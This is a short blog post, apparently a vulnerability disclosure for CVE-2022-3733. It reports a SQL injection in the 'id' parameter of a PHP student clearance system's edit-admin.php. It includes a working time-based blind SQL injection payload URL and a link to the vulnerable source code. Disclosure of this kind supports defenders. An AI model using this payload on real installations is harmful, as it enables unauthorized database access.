Headline
CVE-2022-3733: Web-Based Student Clearance System is vulnerable to a SQL Injection(edit-admin.php)_靳亚东的博客-CSDN博客
A vulnerability was found in SourceCodester Web-Based Student Clearance System. It has been classified as critical. This affects an unknown part of the file Admin/edit-admin.php. The manipulation of the argument id leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-212415.
靳亚东 于 2022-10-27 15:16:33 发布 20 收藏
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
Web-Based Student Clearance System is vulnerable to a SQL Injection(edit-admin.php)
url:/Admin/edit-admin.php
URI parameter ‘id’ is vulnerable
Line 32 of edit-admin.php invokes a SQL query built with input that comes from an untrusted source. This call could allow an attacker to modify the statement’s meaning or to execute arbitrary SQL commands.
Parameter: #1* (URI)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: http://127.0.0.1:80/student_clearance_system_Aurthur_Javis/admin/edit-admin.php?id=5' AND (SELECT 2846 FROM (SELECT(SLEEP(5)))sOPo) AND 'uvpP'='uvpP
Download Code:
https://www.sourcecodester.com/php/15627/web-based-student-clearance-system.html